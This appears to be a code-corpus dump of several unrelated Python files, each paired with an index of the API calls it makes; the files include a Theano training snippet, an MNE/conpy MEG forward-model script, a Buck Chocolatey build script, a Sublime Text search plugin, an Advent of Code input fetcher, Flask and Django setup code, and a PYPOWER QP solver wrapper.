"numpy.float32",
"blocks.bricks.base.application",
"theano.tensor.patternbroadcast",
"theano.tensor.grad",
"theano.sandbox.rng_mrg.MRG_RandomStreams",
"theano.tensor.sqrt",
"collections.OrderedDict",
"logging.getLogger"
] |
[((387, 414), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (404, 414), False, 'import logging\n'), ((945, 1065), 'blocks.bricks.base.application', 'application', ([], {'inputs': "['train_cost', 'model_cost', 'model_prior_mean', 'model_prior_variance']", 'outputs': "['total_cost']"}), "(inputs=['train_cost', 'model_cost', 'model_prior_mean',\n 'model_prior_variance'], outputs=['total_cost'])\n", (956, 1065), False, 'from blocks.bricks.base import Brick, application\n'), ((4942, 4965), 'theano.sandbox.rng_mrg.MRG_RandomStreams', 'MRG_RandomStreams', (['seed'], {}), '(seed)\n', (4959, 4965), False, 'from theano.sandbox.rng_mrg import MRG_RandomStreams\n'), ((5634, 5656), 'collections.OrderedDict', 'OrderedDict', (['gradients'], {}), '(gradients)\n', (5645, 5656), False, 'from collections import OrderedDict\n'), ((6860, 6911), 'theano.tensor.cast', 'tensor.cast', (['(temp_sum / temp_param_count)', '"""float32"""'], {}), "(temp_sum / temp_param_count, 'float32')\n", (6871, 6911), False, 'from theano import tensor\n'), ((7059, 7110), 'theano.tensor.cast', 'tensor.cast', (['(temp_sum / temp_param_count)', '"""float32"""'], {}), "(temp_sum / temp_param_count, 'float32')\n", (7070, 7110), False, 'from theano import tensor\n'), ((6343, 6378), 'theano.tensor.exp', 'tensor.exp', (['(p_ls2 * log_sigma_scale)'], {}), '(p_ls2 * log_sigma_scale)\n', (6353, 6378), False, 'from theano import tensor\n'), ((6511, 6565), 'theano.tensor.patternbroadcast', 'tensor.patternbroadcast', (['p_noisy', 'p.type.broadcastable'], {}), '(p_noisy, p.type.broadcastable)\n', (6534, 6565), False, 'from theano import tensor\n'), ((5389, 5418), 'theano.tensor.grad', 'tensor.grad', (['cost', 'parameters'], {}), '(cost, parameters)\n', (5400, 5418), False, 'from theano import tensor\n'), ((6475, 6492), 'theano.tensor.sqrt', 'tensor.sqrt', (['p_s2'], {}), '(p_s2)\n', (6486, 6492), False, 'from theano import tensor\n'), ((8608, 8684), 'numpy.float32', 'numpy.float32', (['(model_cost_coefficient * 0.5 / num_examples * log_sigma_scale)'], {}), '(model_cost_coefficient * 0.5 / num_examples * log_sigma_scale)\n', (8621, 8684), False, 'import numpy\n'), ((6082, 6105), 'numpy.zeros_like', 'numpy.zeros_like', (['p_val'], {}), '(p_val)\n', (6098, 6105), False, 'import numpy\n'), ((6139, 6160), 'numpy.log', 'numpy.log', (['init_sigma'], {}), '(init_sigma)\n', (6148, 6160), False, 'import numpy\n'), ((7510, 7530), 'theano.tensor.log', 'tensor.log', (['prior_s2'], {}), '(prior_s2)\n', (7520, 7530), False, 'from theano import tensor\n')]
|
import conpy, mne # Import required Python modules
# Define source space on average brain, morph to subject
src_avg = mne.setup_source_space('fsaverage', spacing='ico4')
src_sub = mne.morph_source_spaces(src_avg, subject='sub002')
# Discard deep sources
info = mne.io.read_info('sub002-epo.fif') # Read information about the sensors
verts = conpy.select_vertices_in_sensor_range(src_sub, dist=0.07, info=info)
src_sub = conpy.restrict_src_to_vertices(src_sub, verts)
# Create a one-layer BEM model
bem_model = mne.make_bem_model('sub002', ico=4, conductivity=(0.3,))
bem = mne.make_bem_solution(bem_model)
# Make the forward model
trans = 'sub002-trans.fif' # File containing the MRI<->Head transformation
fwd = mne.make_forward_solution(info, trans, src_sub, bem, meg=True, eeg=False)
# Only retain orientations tangential to a sphere approximation of the head
fwd = conpy.forward_to_tangential(fwd)
|
[
"mne.make_forward_solution",
"conpy.restrict_src_to_vertices",
"mne.make_bem_solution",
"mne.setup_source_space",
"conpy.forward_to_tangential",
"mne.make_bem_model",
"mne.io.read_info",
"conpy.select_vertices_in_sensor_range",
"mne.morph_source_spaces"
] |
[((120, 171), 'mne.setup_source_space', 'mne.setup_source_space', (['"""fsaverage"""'], {'spacing': '"""ico4"""'}), "('fsaverage', spacing='ico4')\n", (142, 171), False, 'import conpy, mne\n'), ((182, 232), 'mne.morph_source_spaces', 'mne.morph_source_spaces', (['src_avg'], {'subject': '"""sub002"""'}), "(src_avg, subject='sub002')\n", (205, 232), False, 'import conpy, mne\n'), ((264, 298), 'mne.io.read_info', 'mne.io.read_info', (['"""sub002-epo.fif"""'], {}), "('sub002-epo.fif')\n", (280, 298), False, 'import conpy, mne\n'), ((345, 413), 'conpy.select_vertices_in_sensor_range', 'conpy.select_vertices_in_sensor_range', (['src_sub'], {'dist': '(0.07)', 'info': 'info'}), '(src_sub, dist=0.07, info=info)\n', (382, 413), False, 'import conpy, mne\n'), ((424, 470), 'conpy.restrict_src_to_vertices', 'conpy.restrict_src_to_vertices', (['src_sub', 'verts'], {}), '(src_sub, verts)\n', (454, 470), False, 'import conpy, mne\n'), ((515, 571), 'mne.make_bem_model', 'mne.make_bem_model', (['"""sub002"""'], {'ico': '(4)', 'conductivity': '(0.3,)'}), "('sub002', ico=4, conductivity=(0.3,))\n", (533, 571), False, 'import conpy, mne\n'), ((578, 610), 'mne.make_bem_solution', 'mne.make_bem_solution', (['bem_model'], {}), '(bem_model)\n', (599, 610), False, 'import conpy, mne\n'), ((719, 792), 'mne.make_forward_solution', 'mne.make_forward_solution', (['info', 'trans', 'src_sub', 'bem'], {'meg': '(True)', 'eeg': '(False)'}), '(info, trans, src_sub, bem, meg=True, eeg=False)\n', (744, 792), False, 'import conpy, mne\n'), ((876, 908), 'conpy.forward_to_tangential', 'conpy.forward_to_tangential', (['fwd'], {}), '(fwd)\n', (903, 908), False, 'import conpy, mne\n')]
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
from vilya.libs.template import st
from vilya.models.project import CodeDoubanProject
_q_exports = []
class BrowsefilesUI:
_q_exports = ['setting']
def __init__(self, proj_name):
self.proj = proj_name
def _q_access(self, request):
if 'json' in request.environ['HTTP_ACCEPT']:
self.output = 'json'
else:
self.output = 'html'
def _q_index(self, request):
project = CodeDoubanProject.get_by_name(self.proj)
user = request.user
path = request.get_form_var('path', '')
rev = request.get_form_var('rev', project.default_branch)
allfiles = project.repo.get_tree(rev, path=path)
allfiles = [_add_file_type_and_warns(f) for f in allfiles]
errors = ''
project_name = self.proj
project = CodeDoubanProject.get_by_name(project_name)
ref = rev
if ref is None:
ref = project.default_branch
branches = project.repo.branches
tags = project.repo.tags
ref_type = 'branch' if ref in branches else 'tag' \
if ref in tags else 'tree'
if self.output == 'json':
return json.dumps(allfiles)
else:
return st('browsefiles.html', **locals())
def _add_file_type_and_warns(node):
code_file_exts = 'py rb c h html mako ptl js css less handlebars coffee sql'.split() # noqa
bad_exts = 'pyc exe'.split()
node_ext = node['path'].rsplit('.')[1] if '.' in node['path'] else ''
if node['type'] == 'tree':
icon_type = 'directory'
elif node['type'] == 'commit':
icon_type = 'submodule'
elif node_ext in code_file_exts:
icon_type = 'code-file'
else:
icon_type = 'text-file'
node['icon-type'] = icon_type
if node_ext in bad_exts:
node['warn'] = 'bad'
else:
node['warn'] = 'no'
return node
|
[
"json.dumps",
"vilya.models.project.CodeDoubanProject.get_by_name"
] |
[((518, 558), 'vilya.models.project.CodeDoubanProject.get_by_name', 'CodeDoubanProject.get_by_name', (['self.proj'], {}), '(self.proj)\n', (547, 558), False, 'from vilya.models.project import CodeDoubanProject\n'), ((896, 939), 'vilya.models.project.CodeDoubanProject.get_by_name', 'CodeDoubanProject.get_by_name', (['project_name'], {}), '(project_name)\n', (925, 939), False, 'from vilya.models.project import CodeDoubanProject\n'), ((1256, 1276), 'json.dumps', 'json.dumps', (['allfiles'], {}), '(allfiles)\n', (1266, 1276), False, 'import json\n')]
|
from Tweet import Tweet
import schedule
from functools import wraps
from threading import Thread
from time import sleep
def Threaded(function):
'''
Every call of the decorated function will spawn a
daemonized thread. Returns a threading.Thread object.
'''
@wraps(function)
def wrapper(*args, **kwargs):
thread = Thread(target=function, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
return wrapper
class Scheduler(object):
@staticmethod
@Threaded
def start():
while True:
schedule.run_pending()
sleep(30)
@staticmethod
def add(day, time):
schedule.every().__getattribute__(day).at(time).do(Tweet)
|
[
"schedule.run_pending",
"threading.Thread",
"time.sleep",
"schedule.every",
"functools.wraps"
] |
[((278, 293), 'functools.wraps', 'wraps', (['function'], {}), '(function)\n', (283, 293), False, 'from functools import wraps\n'), ((345, 394), 'threading.Thread', 'Thread', ([], {'target': 'function', 'args': 'args', 'kwargs': 'kwargs'}), '(target=function, args=args, kwargs=kwargs)\n', (351, 394), False, 'from threading import Thread\n'), ((596, 618), 'schedule.run_pending', 'schedule.run_pending', ([], {}), '()\n', (616, 618), False, 'import schedule\n'), ((631, 640), 'time.sleep', 'sleep', (['(30)'], {}), '(30)\n', (636, 640), False, 'from time import sleep\n'), ((692, 708), 'schedule.every', 'schedule.every', ([], {}), '()\n', (706, 708), False, 'import schedule\n')]
|
#!/usr/bin/env python
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import glob
import os
import shutil
import subprocess
import sys
import xml.etree.ElementTree as ElemTree
def parse_args(args):
parser = argparse.ArgumentParser(description="Build buck's choco package")
parser.add_argument(
"--license-file",
required=True,
help="The original license file that needs a prefix added",
)
parser.add_argument(
"--verification-txt",
required=True,
help="The verification.txt template used when creating the nupkg",
)
parser.add_argument(
"--version", required=True, help="The version that is being built"
)
parser.add_argument(
"--timestamp", required=True, help="The timestamp when the release was made"
)
parser.add_argument(
"--src-dir",
required=True,
help="The directory with all of the source files in it (nuspec and changelog)",
)
parser.add_argument("--output", required=True, help="where to output the nupkg")
return parser.parse_args(args)
def copy_files(src_dir):
# This gets set by genrule in buck
dest_dir = os.environ["TMP"]
if not dest_dir:
raise Exception("TMP was not set in the environment. It must be configured")
for src in glob.glob(os.path.join(src_dir, "*")):
dest = os.path.join(dest_dir, os.path.basename(src))
shutil.copy(src, dest)
return dest_dir
def update_nuspec(nuspec, changelog, version):
ns = "http://schemas.microsoft.com/packaging/2015/06/nuspec.xsd"
nsurl = "{" + ns + "}"
ElemTree.register_namespace("", ns)
root = ElemTree.parse(nuspec)
root.find("./{ns}metadata/{ns}version".format(ns=nsurl)).text = version
with open(changelog, "r") as fin:
root.find("./{ns}metadata/{ns}releaseNotes".format(ns=nsurl)).text = fin.read()
root.write(nuspec)
def build(nuspec, output):
subprocess.check_call(["choco", "pack", nuspec, "--output-directory", os.getcwd()])
os.rename(glob.glob("buck.*.nupkg")[0], output)
def write_license_file(original_license):
dest = "LICENSE.txt"
with open(original_license, "r") as fin, open(dest, "w") as fout:
fout.write("From: https://github.com/facebook/buck/blob/master/LICENSE\n")
fout.write("\n")
fout.write(fin.read())
def write_verification_txt(original_verification_txt, version, timestamp):
dest = "VERIFICATION.txt"
with open(original_verification_txt, "r") as fin, open(dest, "w") as fout:
verification_text = fin.read().decode("utf-8")
verification_text = verification_text.format(
release_version=version, release_timestamp=timestamp
)
fout.write(verification_text)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
tmp_dir = copy_files(args.src_dir)
os.chdir(tmp_dir)
update_nuspec("buck.nuspec", "CHANGELOG.md", args.version)
write_license_file(args.license_file)
write_verification_txt(args.verification_txt, args.version, args.timestamp)
build("buck.nuspec", args.output)
|
[
"xml.etree.ElementTree.parse",
"xml.etree.ElementTree.register_namespace",
"argparse.ArgumentParser",
"os.path.basename",
"os.getcwd",
"glob.glob",
"os.path.join",
"os.chdir",
"shutil.copy"
] |
[((769, 834), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Build buck\'s choco package"""'}), '(description="Build buck\'s choco package")\n', (792, 834), False, 'import argparse\n'), ((2168, 2203), 'xml.etree.ElementTree.register_namespace', 'ElemTree.register_namespace', (['""""""', 'ns'], {}), "('', ns)\n", (2195, 2203), True, 'import xml.etree.ElementTree as ElemTree\n'), ((2215, 2237), 'xml.etree.ElementTree.parse', 'ElemTree.parse', (['nuspec'], {}), '(nuspec)\n', (2229, 2237), True, 'import xml.etree.ElementTree as ElemTree\n'), ((3426, 3443), 'os.chdir', 'os.chdir', (['tmp_dir'], {}), '(tmp_dir)\n', (3434, 3443), False, 'import os\n'), ((1878, 1904), 'os.path.join', 'os.path.join', (['src_dir', '"""*"""'], {}), "(src_dir, '*')\n", (1890, 1904), False, 'import os\n'), ((1976, 1998), 'shutil.copy', 'shutil.copy', (['src', 'dest'], {}), '(src, dest)\n', (1987, 1998), False, 'import shutil\n'), ((1945, 1966), 'os.path.basename', 'os.path.basename', (['src'], {}), '(src)\n', (1961, 1966), False, 'import os\n'), ((2566, 2577), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2575, 2577), False, 'import os\n'), ((2594, 2619), 'glob.glob', 'glob.glob', (['"""buck.*.nupkg"""'], {}), "('buck.*.nupkg')\n", (2603, 2619), False, 'import glob\n')]
|
import sublime
import sublime_plugin
import os.path
import os
import sys
import inspect
from collections import defaultdict
### Start of fixing import paths
# realpath() with make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subforder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "subfolder")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
# Info:
# cmd_folder = os.path.dirname(os.path.abspath(__file__)) # DO NOT USE __file__ !!!
# __file__ fails if script is called in different ways on Windows
# __file__ fails if someone does os.chdir() before
# sys.argv[0] also fails because it doesn't not always contains the path
### End of fixing import paths
import searchengines
basedir = os.getcwd()
class SearchInProjectCommand(sublime_plugin.WindowCommand):
# Used to trim lines for the results quick panel. Without trimming Sublime Text
# *will* hang on long lines - often encountered in minified Javascript, for example.
MAX_RESULT_LINE_LENGTH = 1000
def __init__(self, window):
sublime_plugin.WindowCommand.__init__(self, window)
self.last_search_string = ''
pass
def run(self):
self.settings = sublime.load_settings('SearchInProject.sublime-settings')
self.engine_name = self.settings.get("search_in_project_engine")
pushd = os.getcwd()
os.chdir(basedir)
__import__("searchengines.%s" % self.engine_name)
self.engine = searchengines.__dict__[self.engine_name].engine_class(self.settings)
os.chdir(pushd)
view = self.window.active_view()
selection_text = view.substr(view.sel()[0])
self.window.show_input_panel(
"Search in project:",
not "\n" in selection_text and selection_text or self.last_search_string,
self.perform_search, None, None)
pass
def perform_search(self, text):
if not text:
return
self.last_search_string = text
folders = self.search_folders()
self.common_path = self.find_common_path(folders)
try:
self.results = self.engine.run(text, folders)
if self.results:
self.results = [[result[0].replace(self.common_path.replace('\"', ''), ''), result[1][:self.MAX_RESULT_LINE_LENGTH]] for result in self.results]
self.results.append("``` List results in view ```")
self.window.show_quick_panel(self.results, self.goto_result)
else:
self.results = []
sublime.message_dialog('No results')
except Exception as e:
self.results = []
sublime.error_message("%s running search engine %s:"%(e.__class__.__name__,self.engine_name) + "\n" + str(e))
def goto_result(self, file_no):
if file_no != -1:
if file_no == len(self.results) - 1: # last result is "list in view"
self.list_in_view()
else:
file_name = self.common_path.replace('\"', '') + self.results[file_no][0]
view = self.window.open_file(file_name, sublime.ENCODED_POSITION)
regions = view.find_all(self.last_search_string)
view.add_regions("search_in_project", regions, "entity.name.filename.find-in-files", "circle", sublime.DRAW_OUTLINED)
def list_in_view(self):
self.results.pop()
view = sublime.active_window().new_file()
view.run_command('search_in_project_results',
{'query': self.last_search_string,
'results': self.results,
'common_path': self.common_path.replace('\"', '')})
def search_folders(self):
search_folders = self.window.folders()
if not search_folders:
filename = self.window.active_view().file_name()
if filename:
search_folders = [os.path.dirname(filename)]
else:
search_folders = [os.path.expanduser("~")]
return search_folders
def find_common_path(self, paths):
paths = [path.replace("\"", "") for path in paths]
paths = [path.split("/") for path in paths]
common_path = []
while 0 not in [len(path) for path in paths]:
next_segment = list(set([path.pop(0) for path in paths]))
if len(next_segment) == 1:
common_path += next_segment
else:
break
return "\"" + "/".join(common_path) + "/\""
class SearchInProjectResultsCommand(sublime_plugin.TextCommand):
def format_result(self, common_path, filename, lines):
lines_text = "\n".join([" %s: %s" % (location, text) for location, text in lines])
return "%s%s:\n%s\n" % (common_path, filename, lines_text)
def format_results(self, common_path, results, query):
grouped_by_filename = defaultdict(list)
for result in results:
filename, location = result[0].split(':', 1)
text = result[1]
grouped_by_filename[filename].append((location, text))
line_count = len(results)
file_count = len(grouped_by_filename)
file_results = [self.format_result(common_path, filename, grouped_by_filename[filename]) for filename in grouped_by_filename]
return ("Search In Project results for \"%s\" (%u lines in %u files):\n\n" % (query, line_count, file_count)) \
+ "\n".join(file_results)
def run(self, edit, common_path, results, query):
self.view.set_name('Find Results')
self.view.set_scratch(True)
self.view.set_syntax_file('Packages/Default/Find Results.hidden-tmLanguage')
results_text = self.format_results(common_path, results, query)
self.view.insert(edit, self.view.text_point(0,0), results_text)
self.view.sel().clear()
self.view.sel().add(sublime.Region(0,0))
|
[
"sublime.message_dialog",
"sublime_plugin.WindowCommand.__init__",
"os.getcwd",
"os.path.dirname",
"sublime.Region",
"sys.path.insert",
"collections.defaultdict",
"sublime.active_window",
"sublime.load_settings",
"inspect.currentframe",
"os.path.expanduser",
"os.chdir"
] |
[((1014, 1025), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1023, 1025), False, 'import os\n'), ((365, 395), 'sys.path.insert', 'sys.path.insert', (['(0)', 'cmd_folder'], {}), '(0, cmd_folder)\n', (380, 395), False, 'import sys\n'), ((629, 662), 'sys.path.insert', 'sys.path.insert', (['(0)', 'cmd_subfolder'], {}), '(0, cmd_subfolder)\n', (644, 662), False, 'import sys\n'), ((1337, 1388), 'sublime_plugin.WindowCommand.__init__', 'sublime_plugin.WindowCommand.__init__', (['self', 'window'], {}), '(self, window)\n', (1374, 1388), False, 'import sublime_plugin\n'), ((1483, 1540), 'sublime.load_settings', 'sublime.load_settings', (['"""SearchInProject.sublime-settings"""'], {}), "('SearchInProject.sublime-settings')\n", (1504, 1540), False, 'import sublime\n'), ((1630, 1641), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1639, 1641), False, 'import os\n'), ((1650, 1667), 'os.chdir', 'os.chdir', (['basedir'], {}), '(basedir)\n', (1658, 1667), False, 'import os\n'), ((1825, 1840), 'os.chdir', 'os.chdir', (['pushd'], {}), '(pushd)\n', (1833, 1840), False, 'import os\n'), ((5152, 5169), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (5163, 5169), False, 'from collections import defaultdict\n'), ((6150, 6170), 'sublime.Region', 'sublime.Region', (['(0)', '(0)'], {}), '(0, 0)\n', (6164, 6170), False, 'import sublime\n'), ((2840, 2876), 'sublime.message_dialog', 'sublime.message_dialog', (['"""No results"""'], {}), "('No results')\n", (2862, 2876), False, 'import sublime\n'), ((3701, 3724), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (3722, 3724), False, 'import sublime\n'), ((300, 322), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (320, 322), False, 'import inspect\n'), ((4169, 4194), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (4184, 4194), False, 'import os\n'), ((4248, 4271), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (4266, 4271), False, 'import os\n'), ((547, 569), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (567, 569), False, 'import inspect\n')]
|
import pathlib
import requests
class InputManager:
def __init__(self, year: int, day: int):
self.year = year
self.day = day
self.cache_dir = pathlib.Path(".aoc_cache")
self.cache_dir.mkdir(exist_ok=True)
self.cache_file = self.cache_dir / f"{year}-{day:02}.txt"
def create_input_file(self) -> None:
if self.cache_file.exists():
print(f"Using cached input file: ./{self.cache_file}")
data = self.cache_file.read_text()
else:
print("Fetching input file from adventofcode.com!")
data = self.__make_request()
self.cache_file.write_text(data)
pathlib.Path("input.txt").write_text(data)
def __make_request(self) -> str:
session_cookie = pathlib.Path(".env").read_text().strip()
session_header = {"Cookie": f"session={session_cookie}"}
url = f"https://adventofcode.com/{self.year}/day/{self.day}/input"
return requests.get(url, headers=session_header).text
|
[
"pathlib.Path",
"requests.get"
] |
[((173, 199), 'pathlib.Path', 'pathlib.Path', (['""".aoc_cache"""'], {}), "('.aoc_cache')\n", (185, 199), False, 'import pathlib\n'), ((980, 1021), 'requests.get', 'requests.get', (['url'], {'headers': 'session_header'}), '(url, headers=session_header)\n', (992, 1021), False, 'import requests\n'), ((677, 702), 'pathlib.Path', 'pathlib.Path', (['"""input.txt"""'], {}), "('input.txt')\n", (689, 702), False, 'import pathlib\n'), ((783, 803), 'pathlib.Path', 'pathlib.Path', (['""".env"""'], {}), "('.env')\n", (795, 803), False, 'import pathlib\n')]
|
from flask_user import UserManager
from .create_app import (
app,
db
)
from .user_app import (
user_blueprint,
User,
Role,
UsersRoles
)
from .auth_app import auth_blueprint
from .dashboard_app import dashboard_blueprint
from .wisata_app import wisata_blueprint
from .loader import *
user_manager = UserManager(app, db, User)
app.register_blueprint(user_blueprint)
app.register_blueprint(auth_blueprint)
app.register_blueprint(dashboard_blueprint)
app.register_blueprint(wisata_blueprint)
|
[
"flask_user.UserManager"
] |
[((325, 351), 'flask_user.UserManager', 'UserManager', (['app', 'db', 'User'], {}), '(app, db, User)\n', (336, 351), False, 'from flask_user import UserManager\n')]
|
# Generated by Django 2.1.4 on 2019-02-16 18:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('finance', '0003_transaction_transaction_date'),
]
operations = [
migrations.AlterModelOptions(
name='transaction',
options={'ordering': ('-created_at',)},
),
migrations.AddField(
model_name='transaction',
name='deleted',
field=models.BooleanField(default=False, help_text='If this transaction will be factored in in reports'),
),
migrations.AlterField(
model_name='transaction',
name='amount',
field=models.DecimalField(blank=True, decimal_places=2, default=0, help_text='Negative amounts indicate expenses, positive indicate income', max_digits=100),
),
migrations.AlterField(
model_name='transaction',
name='tag',
field=models.ForeignKey(help_text='The associated tag, important for grouping similar transactions for better reporting', on_delete=django.db.models.deletion.PROTECT, related_name='transactions', to='finance.Tag'),
),
migrations.AlterField(
model_name='transaction',
name='transaction_date',
field=models.DateTimeField(auto_now_add=True, help_text='Transaction date and time could be set to be different from the date and time of creation of record in the database.'),
),
]
|
[
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.DecimalField",
"django.db.migrations.AlterModelOptions",
"django.db.models.DateTimeField"
] |
[((278, 371), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""transaction"""', 'options': "{'ordering': ('-created_at',)}"}), "(name='transaction', options={'ordering': (\n '-created_at',)})\n", (306, 371), False, 'from django.db import migrations, models\n'), ((516, 619), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""If this transaction will be factored in in reports"""'}), "(default=False, help_text=\n 'If this transaction will be factored in in reports')\n", (535, 619), False, 'from django.db import migrations, models\n'), ((741, 900), 'django.db.models.DecimalField', 'models.DecimalField', ([], {'blank': '(True)', 'decimal_places': '(2)', 'default': '(0)', 'help_text': '"""Negative amounts indicate expenses, positive indicate income"""', 'max_digits': '(100)'}), "(blank=True, decimal_places=2, default=0, help_text=\n 'Negative amounts indicate expenses, positive indicate income',\n max_digits=100)\n", (760, 900), False, 'from django.db import migrations, models\n'), ((1015, 1237), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'help_text': '"""The associated tag, important for grouping similar transactions for better reporting"""', 'on_delete': 'django.db.models.deletion.PROTECT', 'related_name': '"""transactions"""', 'to': '"""finance.Tag"""'}), "(help_text=\n 'The associated tag, important for grouping similar transactions for better reporting'\n , on_delete=django.db.models.deletion.PROTECT, related_name=\n 'transactions', to='finance.Tag')\n", (1032, 1237), False, 'from django.db import migrations, models\n'), ((1359, 1538), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'help_text': '"""Transaction date and time could be set to be different from the date and time of creation of record in the database."""'}), "(auto_now_add=True, help_text=\n 'Transaction date and time could be set to be different from the date and time of creation of record in the database.'\n )\n", (1379, 1538), False, 'from django.db import migrations, models\n')]
|
# Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Quadratic Program Solver for PYPOWER.
"""
import sys
from pandapower.pypower.qps_pips import qps_pips
#from pandapower.pypower.qps_ipopt import qps_ipopt
#from pandapower.pypower.qps_cplex import qps_cplex
#from pandapower.pypower.qps_mosek import qps_mosek
#from pandapower.pypower.qps_gurobi import qps_gurobi
from pandapower.pypower.util import have_fcn
def qps_pypower(H, c=None, A=None, l=None, u=None, xmin=None, xmax=None,
x0=None, opt=None):
"""Quadratic Program Solver for PYPOWER.
A common wrapper function for various QP solvers.
Solves the following QP (quadratic programming) problem::
min 1/2 x'*H*x + c'*x
x
subject to::
l <= A*x <= u (linear constraints)
xmin <= x <= xmax (variable bounds)
Inputs (all optional except C{H}, C{c}, C{A} and C{l}):
- C{H} : matrix (possibly sparse) of quadratic cost coefficients
- C{c} : vector of linear cost coefficients
- C{A, l, u} : define the optional linear constraints. Default
values for the elements of C{l} and C{u} are -Inf and Inf,
respectively.
- C{xmin}, C{xmax} : optional lower and upper bounds on the
C{x} variables, defaults are -Inf and Inf, respectively.
- C{x0} : optional starting value of optimization vector C{x}
- C{opt} : optional options structure with the following fields,
all of which are also optional (default values shown in parentheses)
- C{alg} (0) - determines which solver to use
- 0 = automatic, first available of BPMPD_MEX, CPLEX,
Gurobi, PIPS
- 100 = BPMPD_MEX
- 200 = PIPS, Python Interior Point Solver
pure Python implementation of a primal-dual
interior point method
- 250 = PIPS-sc, a step controlled variant of PIPS
- 300 = Optimization Toolbox, QUADPROG or LINPROG
- 400 = IPOPT
- 500 = CPLEX
- 600 = MOSEK
- 700 = Gurobi
- C{verbose} (0) - controls level of progress output displayed
- 0 = no progress output
- 1 = some progress output
- 2 = verbose progress output
- C{max_it} (0) - maximum number of iterations allowed
- 0 = use algorithm default
- C{bp_opt} - options vector for BP
- C{cplex_opt} - options dict for CPLEX
- C{grb_opt} - options dict for gurobipy
- C{ipopt_opt} - options dict for IPOPT
- C{pips_opt} - options dict for L{qps_pips}
- C{mosek_opt} - options dict for MOSEK
- C{ot_opt} - options dict for QUADPROG/LINPROG
- C{problem} : The inputs can alternatively be supplied in a single
C{problem} dict with fields corresponding to the input arguments
described above: C{H, c, A, l, u, xmin, xmax, x0, opt}
Outputs:
- C{x} : solution vector
- C{f} : final objective function value
- C{exitflag} : exit flag
- 1 = converged
- 0 or negative values = algorithm specific failure codes
- C{output} : output struct with the following fields:
- C{alg} - algorithm code of solver used
- (others) - algorithm specific fields
- C{lmbda} : dict containing the Langrange and Kuhn-Tucker
multipliers on the constraints, with fields:
- C{mu_l} - lower (left-hand) limit on linear constraints
- C{mu_u} - upper (right-hand) limit on linear constraints
- C{lower} - lower bound on optimization variables
- C{upper} - upper bound on optimization variables
Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}:
>>> from numpy import array, zeros, Inf
>>> from scipy.sparse import csr_matrix
>>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
... [4.3, 2.2, 2.1, 3.9],
... [6.3, 2.1, 3.5, 4.8],
... [5.9, 3.9, 4.8, 10 ]]))
>>> c = zeros(4)
>>> A = csr_matrix(array([[1, 1, 1, 1 ],
... [0.17, 0.11, 0.10, 0.18]]))
>>> l = array([1, 0.10])
>>> u = array([1, Inf])
>>> xmin = zeros(4)
>>> xmax = None
>>> x0 = array([1, 0, 0, 1])
>>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0)
>>> round(solution["f"], 11) == 1.09666678128
True
>>> solution["converged"]
True
>>> solution["output"]["iterations"]
10
@author: <NAME> (PSERC Cornell)
"""
if opt is None:
opt = {}
# if x0 is None:
# x0 = array([])
# if xmax is None:
# xmax = array([])
# if xmin is None:
# xmin = array([])
## default options
if 'alg' in opt:
alg = opt['alg']
else:
alg = 0
if 'verbose' in opt:
verbose = opt['verbose']
else:
verbose = 0
##----- call the appropriate solver -----
# if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS
## set up options
if 'pips_opt' in opt:
pips_opt = opt['pips_opt']
else:
pips_opt = {}
if 'max_it' in opt:
pips_opt['max_it'] = opt['max_it']
if alg == 200:
pips_opt['step_control'] = False
else:
pips_opt['step_control'] = True
pips_opt['verbose'] = verbose
## call solver
x, f, eflag, output, lmbda = \
qps_pips(H, c, A, l, u, xmin, xmax, x0, pips_opt)
# elif alg == 400: ## use IPOPT
# x, f, eflag, output, lmbda = \
# qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 500: ## use CPLEX
# x, f, eflag, output, lmbda = \
# qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 600: ## use MOSEK
# x, f, eflag, output, lmbda = \
# qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt)
# elif 700: ## use Gurobi
# x, f, eflag, output, lmbda = \
# qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt)
# else:
# print('qps_pypower: {} is not a valid algorithm code\n'.format(alg))
